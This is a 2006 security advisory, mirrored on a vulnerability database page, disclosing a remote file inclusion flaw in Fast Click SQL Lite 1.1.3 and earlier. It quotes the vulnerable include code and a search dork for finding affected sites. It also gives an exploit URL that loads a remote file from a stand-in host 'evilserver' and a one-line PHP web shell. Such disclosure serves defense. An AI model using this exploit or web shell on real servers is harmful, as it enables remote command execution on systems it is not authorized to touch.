Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12545
HistoryMay 05, 2006 - 12:00 a.m.

Fast Click SQL Lite <= 1.1.3 Remote File Inclusion

2006-05-0500:00:00
vulners.com
10
JSON

Fast Click SQL Lite <= 1.1.3 Remote File Inclusion

Aria-security.com advisory
Bug Discovered by R@1D3N (amin emami)
email:[email protected] and [email protected]
Date:02/05/2006
original advisory:http://www.aria-security.net/advisory/fc/fastclicksqllite.txt

Affected software description:
Fast Click SQL Lite <= 1.1.3
Vendor:http://www.ftrain.siteburg.com/fclicksqlpro/fclick.php?fclicksql
Vulnerability: remote file inclusion
Dork:inurl:"fclick.php?id"

Disscution:
The bug reside in show.php

Vulnerable Code:
$CFG['SDIR'] = $path;
$CFG['CDIR'] = $CFG['SDIR']."./common";
require_once($CFG['CDIR']."/error.php");
require_once($CFG['CDIR']."/init.php");

Exploitation example:
http://[target].com/[path]/show.php?path=http://evilserver/cmd.gif?&amp;cmd=uname -a

cmd.gif

<?
system($cmd);
?>

  • Fix *:

Contact the Vendor

===========================================================
Aria Security Research
Http://www.aria-security.net

JSON